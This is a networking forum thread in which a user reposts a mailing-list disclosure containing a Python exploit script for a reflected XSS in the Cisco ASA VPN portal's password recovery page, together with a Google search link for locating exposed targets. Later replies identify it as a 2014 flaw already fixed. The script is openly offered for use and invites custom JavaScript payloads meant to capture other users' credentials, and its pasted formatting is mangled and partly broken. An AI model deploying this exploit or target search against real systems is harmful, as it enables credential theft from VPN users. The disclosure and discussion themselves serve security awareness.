zero day exployt for ASAs, the fun aint over yet

Started by dlots, February 18, 2016, 03:24:48 PM

Previous topic - Next topic

dlots

So my company blocks this page so I can't check it out much, but this is the email that was forwarded to me

Subject: [FD] Cisco ASA VPN - Zero Day Exploit
Message-ID:
   <CANYkwVJZ7B8tzM5t8KWRV+zCnb65JY0+TKV7VYQ4XSBRPcLvQw@mail.gmail.com>
Content-Type: text/plain; charset=UTF-8

# Exploit author: Juan Sacco - jsacco@exploitpack.com # Affected program: Cisco ASA VPN Portal - Zero Day # Cisco ASA VPN is prone to a XSS on the password recovery page.
# This vulnerability can be used by an attacker to capture other user's credentials.
# The password recovery form fails to filter properly the hidden inputs fields.
#
# This Zero Day exploit has been developed and discovered by Juan Sacco.
# Exploit Pack - Team http://exploitpack.com # # Release Dates:
# Reported to Cisco PSIRT Feb 4/2016
# Cisco Dev Team working on a fix Feb 15/2016 # Cisco PSIRT report a CVE Feb 15/2016 # Exploit Pack disclose the bug Feb 15/2016 # Disclosure of the Exploit Feb 16/2016 # # Look for vulnerable targets here:
https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
# More than 18.000 results in Google only

import string, sys
import socket, httplib
import telnetlib

def run():
   try:
    Target = sys.argv[1]
Port = int(sys.argv[2])
# Here goes your custom JS agent code
Payload = "alert(1)"
VulnerableURL =
"/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"
+ Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
CraftedRequest = VulnerableURL
  # Start the connection
connection = httplib.HTTPSConnection(Target) connection.request('GET', CraftedRequest) Response = connection.getresponse() print "Server status response:", Response.status, Response.reason data =  Response.read() vulnerable = "Target is not vulnerable"
for line in str(data).splitlines():
if "juansacco\\\"" in line:
vulnerable = "Targer is vulnerable"
if vulnerable != "Not vulnerable":
print "Result of the test:", vulnerable
# Find the injection on the response
connection.close()
   except Exception,e:
     print "Exploit connection closed " + str(e)

if __name__ == '__main__':
   print "Cisco VPN ASA Exploit - Zero Day"
   print "################################"
   print "Author: Juan Sacco - jsacco@exploitpack.com"

   try:
     Target = sys.argv[1]
     Port = sys.argv[2]
   except IndexError:
     pass
run()


deanwebb

Paaaaaaaaaaaaaaaaaaaatch those ASAs running VPNs!
Take a baseball bat and trash all the routers, shout out "IT'S A NETWORK PROBLEM NOW, SUCKERS!" and then peel out of the parking lot in your Ferrari.
"The world could perish if people only worked on things that were easy to handle." -- Vladimir Savchenko
Вопросы есть? Вопросов нет! | BCEB: Belkin Certified Expert Baffler | "Plan B is Plan A with an element of panic." -- John Clarke
Accounting is architecture, remember that!
Air gaps are high-latency Internet connections.

dlots

It's a Zero day, I don't think there is a patch yet :-(

dlots

Apparently this isn't really a 0 day, it's from 2014  or so.

Otanx

Probably this one from 2013 - https://tools.cisco.com/security/center/viewAlert.x?alertId=30214

Juan Sacco is a pretty good researcher. Done some talks at big conferences so I wonder what is going on  here. If it was a new XSS that is a 0day I would expect to see more coverage about it.

-Otanx



icecream-guy

#5
search on "Cisco PSIRT Feb 4/2016"

fist link is here
https://securityintelligence.com/news/danger-on-the-perimeter-about-the-cisco-asa-vulnerability/

click on the Cisco ASA Alert in that page and the reference is

Cisco ASA Software IKEv1 and IKEv2 Buffer Overflow Vulnerability

so my quick google yields results that we've known about for a few days.

I could be wrong though.

Hitting up AS now..
:professorcat:

My Moral Fibers have been cut.

icecream-guy

Quote from: ristau5741 on February 19, 2016, 08:07:35 AM
Hitting up AS now..

This is not a new vulnerability. It was fixed and previously disclosed in 2014 and is just assigned CVE CVE-2014-2120:

https://tools.cisco.com/security/center/viewAlert.x?alertId=33406
:professorcat:

My Moral Fibers have been cut.